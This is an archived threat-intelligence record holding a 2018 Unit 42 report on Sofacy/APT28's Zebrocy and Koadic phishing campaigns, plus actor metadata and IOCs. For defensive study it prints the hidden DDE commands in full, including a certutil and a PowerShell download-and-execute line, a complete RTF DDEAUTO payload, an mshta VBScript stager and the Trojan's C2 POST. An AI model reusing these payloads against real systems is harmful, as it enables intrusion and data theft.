{
	"id": "2df9bedf-a3ee-4d9f-88f7-601c29b5099d",
	"created_at": "2026-04-06T00:12:40.294943Z",
	"updated_at": "2026-04-10T03:37:50.434923Z",
	"deleted_at": null,
	"sha1_hash": "e7b98c3da0dac499cc422a26c19e2d2634a567e8",
	"title": "Sofacy Group’s Parallel Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 271861,
	"plain_text": "Sofacy Group’s Parallel Attacks\r\nBy Bryan Lee, Robert Falcone\r\nPublished: 2018-06-06 · Archived: 2026-04-05 12:53:19 UTC\r\nSummary\r\nThe Sofacy group remains a persistent global threat. Unit 42 and others have shown in the first half of 2018 how\r\nthis threat actor group continues to target multiple organizations throughout the world with a strong emphasis on\r\ngovernment, diplomatic and other strategic organizations primarily in North America and Europe.\r\nFollowing up our most recent Sofacy research in February and March of 2018, we have found a new campaign\r\nthat uses a lesser-known tool widely attributed to the Sofacy group called Zebrocy. Zebrocy is delivered primarily\r\nvia phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable\r\nfile attachments. This third campaign is consistent with two previously reported attack campaigns in terms of\r\ntargeting: the targets were government organizations dealing with foreign affairs. In this case, however, the targets\r\nwere in different geopolitical regions.\r\nAn interesting difference we found in this newest campaign was that the attacks using Zebrocy cast a far wider net\r\nwithin the target organization: the attackers sent phishing emails to an exponentially larger number of\r\nindividuals. The targeted individuals did not follow any significant pattern, and the email addresses were found\r\neasily using web search engines. This is a stark contrast with other attacks commonly associated with the Sofacy\r\ngroup where generally no more than a handful of victims are targeted within a single organization in a focus-fire\r\nstyle of attack.\r\nIn addition to the large number of Zebrocy attacks we discovered, we also observed instances of the Sofacy group\r\nleveraging the Dynamic Data Exchange (DDE) exploit technique previously documented by McAfee. 
The\r\ninstances we observed, however, used the DDE exploit to deliver different payloads than what was observed\r\npreviously. In one instance the DDE attack was used to deliver and install Zebrocy. In another instance, the DDE\r\nattack was used to deliver an open-source penetration testing toolkit called Koadic. The Sofacy group has\r\nleveraged open source or freely available tools and exploits in the past but this is the first time that Unit 42 has\r\nobserved them leveraging the Koadic toolkit.\r\nLinks to previous attacks\r\nIn our February report, we discovered the Sofacy group using Microsoft Office documents with malicious macros\r\nto deliver the SofacyCarberp payload to multiple government entities. In that report, we documented our\r\nobservation that the Sofacy group appeared to use conventional obfuscation techniques to mask their\r\ninfrastructure attribution by using random registrant and service provider information for each of their attacks. In\r\nparticular, we noted that the Sofacy group deployed a webpage on each of the domains. This is odd because\r\nattackers almost never set up an actual webpage on adversary C2 infrastructure. Even stranger, each webpage\r\ncontained the same content within the body. Since that report, we continued our research into this oddity. Using\r\nthis artifact, we were able to pivot and discover another attack campaign using the DealersChoice exploit kit with\r\nsimilar victimology to what we saw in February. Continuing to use this artifact, we discovered another domain\r\nwith the same content body, supservermgr[.]com. This domain was registered on December 20, 2017 and within a\r\nfew days was resolving to 92.222.136[.]105, which belonged to a well-known VPS provider often used by the\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\r\nPage 1 of 12\n\nSofacy group.\r\nUnfortunately, at the time of collection, the C2 domain had been sinkholed by a third party. 
Based on dynamic and\r\nstatic analysis of the malware sample associated with the supservermgr[.]com domain, however, we were able to\r\ndetermine several unique artifacts which allowed us to expand our dataset and discover additional findings. First,\r\nwe determined the sample we collected, d697160ae…, was attempting to communicate to its C2 at\r\nhxxp://supservermgr[.]com/sys/upd/pageupd.php to retrieve a Zebrocy AutoIT downloader. Because the domain\r\nhad been sinkholed, this activity could not be completed. However, we were able to determine a unique, hard-coded\r\nuser agent used for the C2 communications:\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)\r\nUsing AutoFocus, we pivoted from the user agent string to expand our data set to three additional Zebrocy\r\nsamples using the exact same user agent. This led us to additional infrastructure for Zebrocy at 185.25.51[.]198\r\nand 185.25.50[.]93. At this point we had collected nearly thirty samples of Zebrocy in relation to the original\r\nsample and its associated C2 domain. Additional pivoting based on artifacts unique to this malware family\r\nexpanded our dataset to hundreds of samples used over the last several years. Most of the additional samples were\r\nthe Delphi and AutoIT variants as reported by ESET. However, several of the collected samples were a C++\r\nvariant of the Zebrocy downloader tool. In addition, we discovered evidence of a completely different payload in\r\nKoadic being delivered as well. 
Also, we found the IP address 185.25.50[.]93 hosting C2 services for a Delphi\r\nbackdoor that ESET's report states is the final-stage payload for these attacks.\r\nA Maltego chart diagramming the relational analysis we performed is below:\r\nFigure 1 Visualization of relationships\r\nPlease note this is not a comprehensive chart of all Zebrocy and Koadic samples we were able to collect. Only\r\nsamples mentioned or relevant to the relational analysis have been included.\r\nFrom the 185.25.50[.]93 C2 IP, we discovered another hard-coded user agent being used by Zebrocy:\r\nMozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko\r\nWe observed several samples of Zebrocy using this user agent targeting the foreign affairs ministry of a large\r\nCentral Asian nation. Pivoting off this artifact provided us additional Zebrocy samples. One sample in\r\nparticular, cba5ab65a…, used yet another unique user agent string in combination with the previous user agent for\r\nits C2:\r\nMozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1\r\nA malware sample using two separate unique user agent strings is uncommon. A closer examination of the tool\r\nrevealed the second user agent string was from a secondary payload that was retrieved by the cba5ab65a…\r\nsample. Pivoting from the Mozilla v5.1 user agent revealed over forty additional Zebrocy samples, with several\r\nagain targeting the same Central Asian nation. 
Two samples specifically, 25f0d1cbc… and 115fd8c61…, provided\r\nadditional artifacts we were able to pivot from to discover weaponized documents to deliver Zebrocy as well as\r\nKoadic.\r\nExamining the use of the unique user agent strings over time shows that while previously only the Mozilla/5.0\r\nuser agent was in use, since mid-2017 all three user agent strings have been used by the Zebrocy tool for its C2\r\ncommunications.\r\nFigure 2 Timeline of User Agents\r\nDDE Documents\r\nThe two weaponized documents we discovered leveraging DDE were of particular interest due to victimology and\r\na change in tactics.\r\nWhile examining 25f0d1cbc…, we were able to pivot from its C2 220.158.216[.]127 to gather additional Zebrocy\r\nsamples as well as a weaponized document. This document (85da72c7d…) appears to have been targeting a North\r\nAmerican government organization dealing with foreign affairs. It leveraged DDE to retrieve and install a payload\r\nonto the victim host. A decoy document is deployed in this attack, with the contents purporting to be a publicly\r\navailable document from the United Nations regarding the Republic of Uzbekistan.\r\nFigure 3 Example of delivery document\r\nFigure 4 Lure image used\r\nThe creator of the weaponized document appended their DDE instructions to the end of the document after all of\r\nthe decoy contents. When the document is opened in Word, the instructions are not immediately visible, as Word\r\ndoes not display these fields' contents by default. 
As you can see in the following screenshot, simply attempting to\r\nhighlight the lines in which the DDE instructions reside does not display them.\r\nFigure 5 Hidden DDE commands\r\nEnabling the “Toggle Field Codes” feature reveals the DDE instructions to us and shows that the author had set the\r\ninstructions in size 1 font with white coloring. The use of a white font coloring to hide contents within a\r\nweaponized document is a technique we had previously reported being used by the Sofacy group in a malicious\r\nmacro attack.\r\nThe DDE instructions attempt to run the following command on the victim host, which attempts to\r\ndownload and execute a payload from a remote server:\r\nC:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\\r\nSystem32\\\\rundll32.exe\r\nC:\\\\Windows\\\\System32\\\\shell32.dll,ShellExec_RunDLL\r\nC:\\\\Windows\\\\System32\\\\cmd.exe /k certutil -urlcache -split -f\r\nhxxp://220.158.216[.]127/MScertificate.exe \u0026 MScertificate.exe\"\r\nDuring our analysis, we observed this DDE downloading and executing a Zebrocy AutoIt downloader\r\n(f27836430…), configured to attempt to download an additional payload from 220.158.216[.]127. The DDE\r\ninstructions also included another command that it did not run, which suggests it is an artifact of a prior version of\r\nthis delivery document. 
The following shows this unused command, which exposed an additional server within\r\nSofacy’s infrastructure and would download and execute an encoded PowerShell script from 92.114.92[.]102:\r\nC:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\\r\nSystem32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -sta -NonI -W\r\nhidden $e=(New-Object\r\nSystem.Net.webClient).downloadString('hxxp://92.114.92[.]102:80/d');powershell -enc $e #\r\nThe unused command above appears to be related to previous attacks, specifically attacks that occurred in\r\nNovember 2017 as discussed by McAfee and ESET. The payload delivered in these November 2017 attacks using\r\nDDE-enabled documents was SofacyCarberp, which differs from the Zebrocy downloader delivered in the\r\nFebruary 2018 attacks.\r\n115fd8c61… was another Zebrocy sample we were able to pivot from by gathering additional samples connecting\r\nto its C2 86.106.131[.]177. The additional samples targeted the same large Central Asian nation state as previously\r\nmentioned, but more interestingly, one of the samples was a weaponized document also leveraging DDE and\r\ncontaining a non-Zebrocy payload. The payload turned out to be an open source penetration test toolkit called\r\nKoadic. It is a toolkit similar to Metasploit or PowerShell Empire and is freely available to anyone on GitHub.\r\nFigure 6 Example of delivery document\r\nThe RTF document (8cf3bc2bf...) 
was very small in size at 264 bytes, which can be seen in its entirety here:\r\n{\\rtf1{\\field{\\*\\fldinst DDEAUTO \"C:\\\\\\\\WIndowS\\\\\\\\SYsTem32\\\\\\\\cMD.eXe\r\n\" \"/C POWErsHELl.eXE  -ex     BypaSs  -NOP -w      HIdDen  (NEw-oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe(\r\n'hxxp://86.106.131[.]177/link/GRAPH.EXE'\r\n  ,       '%apPDAtA%\\graph.exe'   )   ;       saps\r\n    '%Appdata%\\graph.exe'\"}}}\r\nThe contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the\r\nKoadic payload from a remote server, save it as an executable file on the system and then execute the payload.\r\nConclusion\r\nThe Sofacy group continues their targeted attack campaigns in 2018. As mentioned in this blog, Sofacy is carrying\r\nout parallel campaigns to attack similar targets around the world but with different toolsets. The Zebrocy tool\r\nassociated with this current strain of attacks is constructed in several different forms based on the programming\r\nlanguage the developer chose to create the tool. We have observed Delphi, AutoIt, and C++ variants of Zebrocy,\r\nall of which are related not only in their functionality, but also at times by chaining the variants together in a single\r\nattack. 
These attacks are still largely perpetrated via spear phishing campaigns, ranging from simple executable\r\nattachments, in the hope that a victim will launch the file, to a previously observed DDE exploitation technique.\r\nPalo Alto Networks customers are protected from Zebrocy and Koadic attacks by:\r\nAll known Zebrocy samples have a malicious verdict in WildFire\r\nAutoFocus customers can track this campaign with the following Tags:\r\nZebrocy\r\nKoadic\r\nAppendix\r\nZebrocy C++ Variant\r\nOn February 19, 2018, we saw a spear phishing email sent to a foreign affairs organization within a Central Asian\r\ncountry, which attempted to deliver an attached Zebrocy downloader (5b5e80f63...) written in the Delphi\r\nprogramming language. This downloader obtained a second downloader, which in this case was very similar in\r\nfunctionality but was written in C++ instead of Delphi.\r\nThis variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the\r\nlabel \"C:\\\" and the computer name. It then creates an invisible window (0x0 pixel) in the bottom right corner of\r\nthe screen, which will call the main function of the Trojan.\r\nThe main function of the Trojan interacts with its configured C2 server to obtain additional code to execute. The\r\nmain function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number\r\nthat the sub-function uses as a case within a switch statement to decrypt the desired string. 
For instance, here are\r\nthe resulting decrypted strings from each of the case statements (dd7e69e1...):\r\nCase - String decrypted\r\n1 - 185.25.50[.]93\r\n2 - POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1\\r\\nHost: 185.25.50[.]93\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length:\r\n3 - porg=\r\n4 - Content-Length:\r\nThe Trojan uses raw sockets to communicate with its C2 server and uses the decrypted strings above to create\r\nHTTP requests. It starts by calling this specific sub-function with an argument of 1 to get the IP address for the C2\nto connect to. It then calls the sub-function with the argument of 2 to get the string that it will use as the HTTP POST\nrequest. The main function then calls the sub-function with the argument 3 to get the POST data parameter\n(“porg”) along with the volume serial number and computer name and will send this data to the C2 via the HTTP\nPOST request. The resulting HTTP POST request looks like the following:\nPOST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1\nHost: 185.25.50[.]93\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 21\nporg=44908AE0524f422d\nWe have not seen a C2 server respond to our requests during our analysis; however, we do know how the Trojan\nwill parse the C2's response for specific data.\n-1 - Deletes the buffer and exits the Trojan.\n009 - Deletes the buffers and exits the Trojan.\nIf neither of the above values are found at the beginning of the HTTP response, the Trojan checks the C2 response\nfor the ASCII representation of hexadecimal bytes. 
The Trojan will convert these hexadecimal bytes to their\nbinary values and write them to a file and will run the file using the \"open\" operation of the ShellExecuteW API\nfunction.\nWe have seen the following HTTP POST parameters within the Zebrocy C++ samples:\nporg\nstructOne\noq\nvolume\nDDE Details\nThe author of the DDE document used in the February 2018 attacks used some obfuscation techniques in an\nattempt to evade detection. First, the DDE instructions heavily rely on the QUOTE field, which converts decimal\nvalues to their ASCII equivalent character. Also, the author capitalized the “E” in the “dde” command to evade\ncase-sensitive signatures. Lastly, the author bolded the “dd” characters within the “dde” command, which breaks\nthe string up within the XML of the DOCX file (word/document.xml) to make signature development difficult, as\nseen here:\n[listing from word/document.xml not captured in extraction; only the fragment \"ddE\" survived]\nIn addition to the aforementioned DOCX file, we found another related DDE-enabled document based on an\ninfrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that\ndownloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the\ntarget or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded\nKoadic.\nThe payload (abbad7acd...) is an executable that appears to have been created by a VBScript to Executable tool\nand further obfuscated with a cryptor. Our analysis shows some possible ties to the Vbs to Exe tool by F2KO\nSoftware but we have yet to confirm a direct overlap. We believe the actor used a cryptor on the payload, as it\nobtains a filename and script from within its resources and decodes these resources by multiplying each byte by\nnegative one. 
The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be\na hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypt the\nresulting decoded data. For instance, the following data exists within a resource:\nfb 70 b0 c9 bd c5 8a d4 0c 54 fd 4c 6d bb f0 0f\nBy multiplying each byte by -1, we obtain the following data:\n05 90 50 37 43 3b 76 2c f4 ac 03 b4 93 45 10 f1\nAfter using RC4 and the key 14331d289e737093994395d3fc412afc, the following cleartext data appears:\n\\x00\\x00\\x00\\x00FlashRun.vbs\nWe do not see the payload using this FlashRun.vbs filename; instead it uses a temporary file name to store an\nembedded VBScript file, such as %Temp%\\4.tmp\\5.vbs. The embedded VBScript is retrieved from a resource and\ndecrypted using the same algorithm as discussed above, which results in the following cleartext:\nset objshell = createobject(\\\"wscript.shell\\\")\nobjshell.run \\\"mshta hxxp://86.106.131.177:6500/zIZFh\\\",vbhide\r\nThe Koadic C2 server will respond to this request with JavaScript code that acts as the Koadic staging payload,\r\nwhich allows the actor to run additional Koadic modules on the end system to carry out their post-exploitation\r\nactivities. 
Unfortunately, we did not observe the Koadic modules used by Sofacy during our analysis.\r\nIOCs\r\nDomain\r\nsupservermgr[.]com\r\nURL\r\nhxxp://supservermgr[.]com/sys/upd/pageupd.php\r\nZebrocy\r\nd697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc\r\ncba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df\r\n25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8\r\n115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03\r\nf27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1\r\n5b5e80f63c04402d0b282e95e32155b2f86cf604a6837853ab467111d4ac15e2\r\ndd7e69e14c88972ac173132b90b3f4bfb2d1faec15cca256a256dd3a12b6e75d\r\nKoadic\r\nabbad7acd50754f096fdc6551e728aa6054dcf8e55946f90a02b17db552471ca\r\nUser Agents\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)\r\nMozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko\r\nMozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1\r\nIPs\r\n185.25.51[.]198\r\n185.25.50[.]93\r\n220.158.216[.]127\r\n92.114.92[.]102\r\n86.106.131[.]177\r\nDDE Docs\r\n85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5\r\n8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff\r\nSource: https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
	],
	"report_names": [
		"unit42-sofacy-groups-parallel-attacks"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434360,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e7b98c3da0dac499cc422a26c19e2d2634a567e8.pdf",
		"text": "https://archive.orkl.eu/e7b98c3da0dac499cc422a26c19e2d2634a567e8.txt",
		"img": "https://archive.orkl.eu/e7b98c3da0dac499cc422a26c19e2d2634a567e8.jpg"
	}
}